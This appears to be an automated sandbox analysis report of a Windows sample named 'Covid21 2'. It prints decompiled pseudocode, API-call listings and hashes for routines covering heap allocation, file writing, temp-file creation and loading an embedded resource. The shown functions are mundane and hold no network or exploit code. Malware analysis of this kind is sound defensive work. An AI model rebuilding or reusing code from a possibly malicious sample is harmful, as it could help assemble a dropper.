                                  • Opcode ID: 11df7a65c876ebf354b943cab2a5a00fea6b763c2f44af75c1fb0680a71a7411
                                  • Instruction ID: a76ebcc7f67d18b801f3b767a6748b9316446318bb46ef4dd2753a3a033da90a
                                  • Opcode Fuzzy Hash: 11df7a65c876ebf354b943cab2a5a00fea6b763c2f44af75c1fb0680a71a7411
                                  • Instruction Fuzzy Hash: 7AD095700A062080EA80BBF36813A4C2C1C8F88B8EF4580BFB141380E39E3C921416BF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 580 406170-4061ab call 40662c CreateFileA 583 4061c6-4061c8 580->583 584 4061ad-4061c4 CreateFileA 580->584 585 406211-406216 583->585 586 4061ca-4061fd RtlAllocateHeap 583->586 584->583 584->585 589 406224-40622a 585->589 590 406218-40621f call 4066bb 585->590 587 406208-40620e 586->587 588 4061ff-406205 586->588 590->589
                                  C-Code - Quality: 100%
                                  			E00406170(void* __eflags, intOrPtr _a4) {
                                  				CHAR* _v0;
                                  				intOrPtr _v4;
                                  				void** _t10;
                                  				void* _t11;
                                  				intOrPtr _t13;
                                  				CHAR* _t19;
                                  				intOrPtr _t20;
                                  				void* _t21;
                                  				void* _t22;
                                  				void** _t23;
                                  
                                  				_t20 =  *0x40b484; // 0x27d05a8
                                  				_t10 = E0040662C(_t20, _a4);
                                  				_t19 = _v0;
                                  				_t23 = _t10; // executed
                                  				_t11 = CreateFileA(_t19, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
                                  				_t22 = _t11;
                                  				if(_t22 != 0xffffffff) {
                                  					L2:
                                  					if(_t22 == 0) {
                                  						goto L6;
                                  					} else {
                                  						 *_t23 = _t22;
                                  						_t21 =  *0x40b13c; // 0x27d0000
                                  						_t23[1] = RtlAllocateHeap(_t21, 0, 0x1000);
                                  						_t23[2] = 0x1000;
                                  						_t23[3] = 0;
                                  						_t23[5] = 1;
                                  						if(_v4 != 0xffffffff) {
                                  							return _t22;
                                  						} else {
                                  							return _t23;
                                  						}
                                  					}
                                  				} else {
                                  					_t22 = CreateFileA(_t19, 0x40000000, 1, 0, 5, 0, 0);
                                  					if(_t22 == 0xffffffff) {
                                  						L6:
                                  						if(_a4 == 0xffffffff) {
                                  							_t13 =  *0x40b484; // 0x27d05a8
                                  							E004066BB(_t13, _t23);
                                  						}
                                  						return 0;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}














                                  APIs
                                  • CreateFileA.KERNELBASE(00000000,C0000000,00000001,00000000,00000002,00000080,00000000,027D05A8,00000000,?,?,?,00000000,00401A7E,00000001,00000000), ref: 004061A4
                                  • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401A7E,00000001,00000000,00000000,0040A0C7), ref: 004061BD
                                  • RtlAllocateHeap.NTDLL(027D0000,00000000,00001000), ref: 004061DA
                                  Similarity
                                  • API ID: CreateFile$AllocateHeap
                                  • String ID:
                                  • API String ID: 2813278966-0
                                  • Opcode ID: fd85d5c3d97d33bbbb50d1206920227a120f6e094763f4a604cbe65cb46f2769
                                  • Instruction ID: 000130b85e76915fa5d363925ece99765dbccc5cf3196bdbfab5f4711e28a0ca
                                  • Opcode Fuzzy Hash: fd85d5c3d97d33bbbb50d1206920227a120f6e094763f4a604cbe65cb46f2769
                                  • Instruction Fuzzy Hash: F211B67234030066D230AB69AD49F57B798D790B71F21872AF3A1BB2D1C7B6A8548768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 592 405f13-405f20 593 405f22-405f50 strncpy strlen 592->593 594 405f86 592->594 595 405f68-405f70 593->595 596 405f88-405f89 594->596 597 405f52-405f5a 595->597 598 405f72-405f84 CreateDirectoryA 595->598 599 405f66 597->599 600 405f5c-405f5f 597->600 598->596 599->595 600->599 601 405f61-405f64 600->601 601->598 601->599
                                  C-Code - Quality: 100%
                                  			E00405F13(char* _a4) {
                                  				char _v8;
                                  				char _v268;
                                  				char* _t16;
                                  				int _t18;
                                  				char* _t20;
                                  				char _t21;
                                  				void* _t22;
                                  
                                  				if(_a4 == 0) {
                                  					return 0;
                                  				}
                                  				strncpy( &_v268, _a4, 0x104);
                                  				_v8 = 0;
                                  				_t16 = _t22 + strlen( &_v268) - 0x108;
                                  				while(_t16 >  &_v268) {
                                  					_t20 = _t16 - 1;
                                  					_t21 =  *_t20;
                                  					if(_t21 == 0x20 || _t21 == 0x5c || _t21 == 0x2f) {
                                  						_t16 = _t20;
                                  						continue;
                                  					} else {
                                  						break;
                                  					}
                                  				}
                                  				 *_t16 = 0;
                                  				_t18 = CreateDirectoryA( &_v268, 0); // executed
                                  				return _t18;
                                  			}











                                  APIs
                                  Similarity
                                  • API ID: CreateDirectorystrlenstrncpy
                                  • String ID:
                                  • API String ID: 2535372781-0
                                  • Opcode ID: 01aa21823cffc10e34e7013d8b7c9e6cafb9b4a409ff1ea4c43c60d8ae1ca257
                                  • Instruction ID: 106eb3b8964d5d9676c23aae3fc3b966741f8cbe397171ba60076510be6c1ab0
                                  • Opcode Fuzzy Hash: 01aa21823cffc10e34e7013d8b7c9e6cafb9b4a409ff1ea4c43c60d8ae1ca257
                                  • Instruction Fuzzy Hash: 0701F9319086099EDB21DA24CC89BEB77799B10344F5400B6E5C4E21D1DBBC9BC8CF1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 74%
                                  			E00401BF4(void* __eflags, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				CHAR* _v20;
                                  				CHAR* _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _t15;
                                  				intOrPtr _t19;
                                  				intOrPtr _t25;
                                  				void* _t59;
                                  				void* _t60;
                                  				void* _t61;
                                  				intOrPtr _t62;
                                  				void* _t63;
                                  				intOrPtr _t65;
                                  				void* _t66;
                                  				intOrPtr* _t67;
                                  				void* _t69;
                                  
                                  				_t69 = __eflags;
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_v20 = E00403DC0(0x400);
                                  				_t15 =  *0x40b3f8; // 0x0
                                  				E00405EB2(_t69, _t15);
                                  				_t59 = _t15;
                                  				E004030F0( &_v20, _t59);
                                  				GetTempFileNameA(_v20, 0x40a00d, 0, _v24);
                                  				_t19 =  *0x40b3f8; // 0x0
                                  				E00403E50(_v24, _t19);
                                  				_t60 = _t19;
                                  				E004030F0(0x40b170, _t60);
                                  				E00403E30( *_t67);
                                  				E00405EA0( *0x40b170); // executed
                                  				E00405F13( *0x40b170);
                                  				_t25 =  *0x40b3f8; // 0x0
                                  				E00405DD5(_t69, _t25);
                                  				_t61 = _t25;
                                  				E004030F0(0x40b168, _t61);
                                  				_push(E00403EA0(_v28));
                                  				if(0 !=  *_t67) {
                                  					__eflags = 1 - _v20;
                                  					if(1 == _v20) {
                                  						_v8 = 1;
                                  					}
                                  				} else {
                                  					if(E00403EA0(_a4 + 1) == 1) {
                                  						_push( *0x40b168);
                                  						L00408011();
                                  						_push( *0x40b3f8);
                                  						E004074F0(0x40a00e);
                                  						_t65 =  *0x40b168; // 0x29a4870
                                  						E004074F0(_t65);
                                  						_pop(_t66);
                                  						E004030F0(0x40b16c, _t66);
                                  					}
                                  					_t62 =  *0x40b170; // 0x29a4838
                                  					_push( *0x40b3f8);
                                  					E004074F0(_t62);
                                  					_pop(_t63);
                                  					E004030F0(0x40b168, _t63);
                                  					_v8 = 2;
                                  				}
                                  				 *0x40b160 = E00403EA0(_a4 + _v8);
                                  				 *0x40b164 = E00403EA0(_a4 + _v8 + 1);
                                  				return E00407550(1, _v12);
                                  			}





















                                  APIs
                                    • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(00D40000,00000008,00000000), ref: 00403DD1
                                    • Part of subcall function 00405EB2: GetTempPathA.KERNEL32(00000104,00000000,00000104,004013CA,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                    • Part of subcall function 00405EB2: LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405ED6
                                    • Part of subcall function 00405EB2: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                    • Part of subcall function 00405EB2: GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA), ref: 00405EF5
                                    • Part of subcall function 00405EB2: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405EFA
                                  • GetTempFileNameA.KERNEL32(?,0040A00D,00000000,?,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000,00000000,00000000), ref: 00401C2E
                                    • Part of subcall function 00403E50: memcpy.MSVCRT ref: 00403E83
                                    • Part of subcall function 00403E30: HeapFree.KERNEL32(00D40000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                    • Part of subcall function 00405F13: strncpy.MSVCRT ref: 00405F31
                                    • Part of subcall function 00405F13: strlen.MSVCRT ref: 00405F41
                                    • Part of subcall function 00405F13: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00405F7E
                                    • Part of subcall function 00405DD5: GetCurrentDirectoryA.KERNEL32(00000104,00000000,00000104,?,?,?,00000000,00401C79,00000000,00000000,?,00000000,00000000,?,0040A00D,00000000), ref: 00405DEB
                                    • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                  Strings
                                  Similarity
                                  • API ID: DirectoryFreeHeapLibraryNamePathTempstrlen$AddressAllocateCreateCurrentFileLoadLongProcmemcpystrncpy
                                  • String ID: "*
                                  • API String ID: 4243183096-3137671172
                                  • Opcode ID: 5de984f9e461d23f3f0c4006e05cee6915a4fb818d52de746b579485cf50a481
                                  • Instruction ID: 51c46ce23f5c993c5dfa76041344c512df945007a9040ee44b4dad7dc5fa6996
                                  • Opcode Fuzzy Hash: 5de984f9e461d23f3f0c4006e05cee6915a4fb818d52de746b579485cf50a481
                                  • Instruction Fuzzy Hash: 9A3110701143019FC700EF75ED92A5B7B69EB44315F50483EB440B61B2CB39AD419B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 650 4066f1-406737 RtlAllocateHeap * 2
                                  C-Code - Quality: 100%
                                  			E004066F1(signed int _a4) {
                                  				signed int _v0;
                                  				signed int _v4;
                                  				signed int _t11;
                                  				void* _t13;
                                  				signed int _t16;
                                  				signed int* _t18;
                                  
                                  				_t18 = RtlAllocateHeap( *0x40b13c, 8, 0x20);
                                  				_t11 = _v4;
                                  				_t18[3] = _t18[3] & 0x00000000;
                                  				_t18[4] = _a4;
                                  				_t16 = _v0;
                                  				 *_t18 = _t11;
                                  				_t18[1] = _t16;
                                  				_t18[2] = _t16;
                                  				_t13 = RtlAllocateHeap( *0x40b13c, 8, _t11 * _t16); // executed
                                  				_t18[7] = _t13;
                                  				return _t18;
                                  			}

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                  • RtlAllocateHeap.NTDLL(00000008,00001000), ref: 0040672E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AllocateHeap
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E00404AB3() {
                                  				intOrPtr _t1;
                                  				struct HICON__* _t3;
                                  				intOrPtr _t5;
                                  
                                  				_push(E00404925);
                                  				_push(0x10);
                                  				_t1 = E004066F1(0x30);
                                  				_push(E00404A7E);
                                  				_push(0);
                                  				 *0x40b474 = _t1;
                                  				 *0x40b478 = E00406434(0x58); // executed
                                  				_t3 = LoadIconA( *0x40b140, 1); // executed
                                  				 *0x40b47c = _t3;
                                  				 *0x40b480 = LoadCursorA(0, 0x7f00);
                                  				_push(0);
                                  				_push(0);
                                  				_t5 = E00406434(0x5c);
                                  				 *0x40b3f4 = _t5;
                                  				return _t5;
                                  			}

                                  APIs
                                    • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                    • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00001000), ref: 0040672E
                                    • Part of subcall function 00406434: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00406441
                                  • LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AllocateHeap$Load$CursorIcon
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 659 407470-4074b6 HeapCreate RtlAllocateHeap
                                  C-Code - Quality: 100%
                                  			E00407470() {
                                  				void* _t1;
                                  				long _t2;
                                  				void* _t3;
                                  				void* _t4;
                                  
                                  				_t1 = HeapCreate(1, 0x1000, 0); // executed
                                  				 *0x40b3fc = _t1;
                                  				 *0x40b3f8 = 0;
                                  				 *0x40b48c = 0x10;
                                  				_t2 =  *0x40b48c; // 0x4104
                                  				_t4 =  *0x40b3fc; // 0x29a0000
                                  				_t3 = RtlAllocateHeap(_t4, 1, _t2);
                                  				 *0x40a38c = _t3;
                                  				return _t3;
                                  			}

                                  APIs
                                  • HeapCreate.KERNELBASE(00000001,00001000,00000000,?,00401049,00000000,00001000,00000000,00000000), ref: 0040747C
                                  • RtlAllocateHeap.NTDLL(029A0000,00000001,00004104), ref: 004074AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCreate
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 660 403694-4036a1 6FA4DB20 CoInitialize
                                  C-Code - Quality: 37%
                                  			E00403694() {
                                  				void* _t1;
                                  
                                  				L00407E14();
                                  				_t1 =  *0x40a88c(0); // executed
                                  				return _t1;
                                  			}

                                  APIs
                                  • 6FA4DB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                  • CoInitialize.OLE32(00000000), ref: 0040369B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Initialize
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407750(intOrPtr _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _t10;
                                  				void* _t12;
                                  				intOrPtr _t15;
                                  				void* _t17;
                                  				intOrPtr _t18;
                                  				void* _t22;
                                  				void* _t25;
                                  
                                  				_t10 =  *0x40b3f8; // 0x0
                                  				_v12 = _t10 + _a4;
                                  				_t18 =  *0x40b48c; // 0x4104
                                  				if(_v12 >= _t18 - 4) {
                                  					 *0x40b48c = _v12 + 0x4000;
                                  					_t15 =  *0x40b48c; // 0x4104
                                  					_t22 =  *0x40a38c; // 0x29a06f0
                                  					_t25 =  *0x40b3fc; // 0x29a0000
                                  					_t17 = RtlReAllocateHeap(_t25, 1, _t22, _t15 + 5); // executed
                                  					 *0x40a38c = _t17;
                                  				}
                                  				_t12 =  *0x40a38c; // 0x29a06f0
                                  				_v8 = _t12 + _a8;
                                  				 *0x40b3f8 = _a8 + _a4;
                                  				return _v8;
                                  			}

                                  APIs
                                  • RtlReAllocateHeap.NTDLL(029A0000,00000001,029A06F0,000040FF), ref: 00407797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AllocateHeap
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E004030A0(void* __eax, signed int _a4, intOrPtr _a8) {
                                  				intOrPtr _v0;
                                  				intOrPtr _v4;
                                  				void* _t14;
                                  				void* _t15;
                                  				intOrPtr _t19;
                                  
                                  				_push(__eax);
                                  				_t14 = RtlAllocateHeap( *0x40b13c, 8, _a4 * (__eax + 1) + 0x18); // executed
                                  				_pop(_t19);
                                  				_t15 = _t14;
                                  				if(_t15 != 0) {
                                  					 *((intOrPtr*)(_t15 + 0x10)) = _t19;
                                  					 *((intOrPtr*)(_t15 + 4)) = _v4;
                                  					 *((intOrPtr*)(_t15 + 8)) = _v0;
                                  					 *((intOrPtr*)(_t15 + 0xc)) = _a4;
                                  					 *((intOrPtr*)(_t15 + 0x14)) = _a8;
                                  					 *_t15 = 1;
                                  					_t15 = _t15 + 0x18;
                                  				}
                                  				 *_a4 = _t15;
                                  				return _t15;
                                  			}

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AllocateHeap
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405F90(void** _a4) {
                                  				long _v4;
                                  				void** _t20;
                                  
                                  				_t20 = _a4;
                                  				_v4 = 0;
                                  				if(_t20[5] == 0) {
                                  					WriteFile( *_t20, _t20[1], _t20[2] - _t20[3],  &_v4, 0); // executed
                                  					_t20[3] = _t20[2];
                                  					return _v4;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,004063E4,00000000,?,?,?,00406298,00000000,?,?), ref: 00405FB5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FileWrite
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406807() {
                                  				void* _t1;
                                  
                                  				_t1 = HeapCreate(0, 0x400, 0); // executed
                                  				 *0x40b488 = _t1;
                                  				return _t1;
                                  			}

                                  APIs
                                  • HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CreateHeap
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403D90() {
                                  				void* _t1;
                                  
                                  				_t1 = HeapCreate(0, 0x1000, 0); // executed
                                  				 *0x40b44c = _t1;
                                  				return _t1;
                                  			}

                                  APIs
                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CreateHeap
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 76%
                                  			E00405D3C(void* __ecx, struct HWND__* _a4) {
                                  				char _v12;
                                  				intOrPtr _t9;
                                  				int _t18;
                                  
                                  				if(GetKeyState(9) >= 0 || GetKeyState(0x11) < 0 || GetKeyState(0x10) < 0 || GetKeyState(0x12) < 0) {
                                  					L6:
                                  					if(GetPropA(_a4, "PB_WindowID") == 0) {
                                  						goto L8;
                                  					} else {
                                  						_t9 =  *((intOrPtr*)(E00406690( *0x40b474, _t8 - 1) + 8));
                                  					}
                                  				} else {
                                  					GetClassNameA(GetFocus(),  &_v12, 5);
                                  					_push(4);
                                  					_t18 =  &_v12;
                                  					_push("Rich");
                                  					_push(_t18);
                                  					L00407DF0();
                                  					if(_t18 != 0 || (SendMessageA(GetFocus(), 0x44e, _t18, _t18) & 0x00000800) != 0) {
                                  						goto L6;
                                  					} else {
                                  						L8:
                                  						_t9 = 0;
                                  					}
                                  				}
                                  				return _t9;
                                  			}







                                  APIs
                                  • GetKeyState.USER32(00000009), ref: 00405D4A
                                  • GetKeyState.USER32(00000011), ref: 00405D52
                                  • GetKeyState.USER32(00000010), ref: 00405D5A
                                  • GetKeyState.USER32(00000012), ref: 00405D62
                                  • GetFocus.USER32 ref: 00405D74
                                  • GetClassNameA.USER32(00000000), ref: 00405D77
                                  • _strncoll.MSVCRT ref: 00405D88
                                  • GetFocus.USER32 ref: 00405D9B
                                  • SendMessageA.USER32(00000000,?,?,00000000), ref: 00405D9E
                                  • GetPropA.USER32(?,PB_WindowID), ref: 00405DB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: State$Focus$ClassMessageNamePropSend_strncoll
                                  • String ID: PB_WindowID$Rich
                                  • API String ID: 4045516979-1396934994
                                  • Opcode ID: 4e29aa54ef8f8318f8280b729776077f5b4d2819b0223c50274e8eba31a3af90
                                  • Instruction ID: 295880306d369912066631a8706d072366ea9287afa58a3d02d5e853e8738312
                                  • Opcode Fuzzy Hash: 4e29aa54ef8f8318f8280b729776077f5b4d2819b0223c50274e8eba31a3af90
                                  • Instruction Fuzzy Hash: 1F0125715407286AED006B61DD0AF9B3F6CEF10744F048533B901F71D6D679A815DAAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00404714(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				long _t14;
                                  				intOrPtr* _t20;
                                  				struct HWND__* _t28;
                                  				void* _t30;
                                  
                                  				_t28 = _a4;
                                  				_t14 = GetWindowLongA(_t28, 0xfffffff4);
                                  				_t27 = _t14;
                                  				if(_t14 == 0xffffffff) {
                                  					return  *0x40a7d0(_t28, _a8, _a12, _a16);
                                  				}
                                  				_t30 = E00406690( *0x40b46c, _t27);
                                  				_a16 = CallWindowProcA( *(_t30 + 0xc), _t28, _a8, _a12, _a16);
                                  				if(_a8 == 0x82) {
                                  					_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)) + 0xc));
                                  					if(_t20 != 0) {
                                  						 *_t20(_t30);
                                  					}
                                  					RemovePropA(_t28, "PB_ID");
                                  					if(RemovePropA(_t28, "PB_DropAccept") != 0) {
                                  						 *0x40a894(_t28);
                                  					}
                                  					SetWindowLongA(_t28, 0xfffffff4, 0xffffffff);
                                  					E004066BB( *0x40b46c, _t27);
                                  				}
                                  				return _a16;
                                  			}








                                  APIs
                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040471F
                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00404748
                                  • RemovePropA.USER32(?,PB_ID), ref: 00404773
                                  • RemovePropA.USER32(?,PB_DropAccept), ref: 0040477B
                                  • RevokeDragDrop.OLE32(?), ref: 00404782
                                  • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 0040478D
                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004047AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$LongPropRemove$CallDragDropNtdllProcProc_Revoke
                                  • String ID: PB_DropAccept$PB_ID
                                  • API String ID: 1182866496-3688647018
                                  • Opcode ID: b8637c9f0dac8dec865cdb6307f1e69eacd637eb45f0958ff8c19843623d497f
                                  • Instruction ID: 26d55dd3bc0a13faf615adc1f81c0240ac0331d9be61dc94d2e7277a1ea7d7dc
                                  • Opcode Fuzzy Hash: b8637c9f0dac8dec865cdb6307f1e69eacd637eb45f0958ff8c19843623d497f
                                  • Instruction Fuzzy Hash: 36118231000205BFCB016F65ED84D6B3BB9EB867747108235F925721E1C7399C219B6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00407E1A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				_Unknown_base(*)()* _v8;
                                  				char _v60;
                                  				intOrPtr* _t30;
                                  				void* _t31;
                                  				intOrPtr _t38;
                                  				void* _t39;
                                  
                                  				sprintf( &_v60, "PB_GadgetStack_%i",  *0x40b140);
                                  				_t39 = GetPropA(_a4,  &_v60);
                                  				if(_t39 == 0) {
                                  					L12:
                                  					return  *0x40a7d0(_a4, _a8, _a12, _a16);
                                  				}
                                  				_v8 =  *((intOrPtr*)(_t39 + 0x14));
                                  				if(_a8 == 0x82) {
                                  					_t30 = E0040642D( *0x40b470);
                                  					if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
                                  						_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0xc))));
                                  					} else {
                                  						_t38 =  *_t30;
                                  					}
                                  					if( *_t39 == _t38) {
                                  						 *_t30 = 0;
                                  						 *((intOrPtr*)(_t30 + 0x10)) = 0;
                                  					}
                                  					_t31 =  *(_t39 + 8);
                                  					if(_t31 != 0) {
                                  						HeapFree( *0x40b13c, 0, _t31);
                                  					}
                                  					HeapFree( *0x40b13c, 0, _t39);
                                  					RemovePropA(_a4,  &_v60);
                                  				}
                                  				if(_v8 == 0) {
                                  					goto L12;
                                  				} else {
                                  					return CallWindowProcA(_v8, _a4, _a8, _a12, _a16);
                                  				}
                                  			}










                                  APIs
                                  • sprintf.MSVCRT ref: 00407E31
                                  • GetPropA.USER32(?,?), ref: 00407E40
                                  • HeapFree.KERNEL32(00000000,?), ref: 00407E95
                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00407E9F
                                  • RemovePropA.USER32(?,?), ref: 00407EA8
                                  • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00407EC3
                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00407ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: FreeHeapPropWindow$CallNtdllProcProc_Removesprintf
                                  • String ID: PB_GadgetStack_%i
                                  • API String ID: 1062891511-1190326050
                                  • Opcode ID: 7d7e1b1d011a983b0eee80d24ab0f834da0d8447be6ad92cb7a62c00b7392fbf
                                  • Instruction ID: 9495be4684c954f4985c5bbed51e6b929ec62d50171bbc7e14f773bf1326b445
                                  • Opcode Fuzzy Hash: 7d7e1b1d011a983b0eee80d24ab0f834da0d8447be6ad92cb7a62c00b7392fbf
                                  • Instruction Fuzzy Hash: F9213772901209FFCF019F90ED44CAA7B7AFB44345B10807AF905A6270D735AE61EB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004020C9(struct HINSTANCE__* _a4, intOrPtr _a8) {
                                  				struct HRSRC__* _v4;
                                  				CHAR* _v8;
                                  				struct HRSRC__* _t14;
                                  				void* _t20;
                                  
                                  				_push(0);
                                  				_push(0);
                                  				E00403100(_t20, _a8);
                                  				_v4 = FindResourceA(_a4, _v8, 0xa);
                                  				if(_v4 != 0) {
                                  					 *0x40b174 = LoadResource(_a4, _v4);
                                  					 *0x40b1b0 = SizeofResource(_a4, _v4);
                                  				}
                                  				_t14 = _v4;
                                  				return E00407550(_t14, _v8);
                                  			}








                                  APIs
                                  • FindResourceA.KERNEL32(004013B1,00000000,0000000A), ref: 004020E6
                                  • LoadResource.KERNEL32(?,00000000,00000000,00000000,004013B1,OPS,00000000,00000000), ref: 004020FE
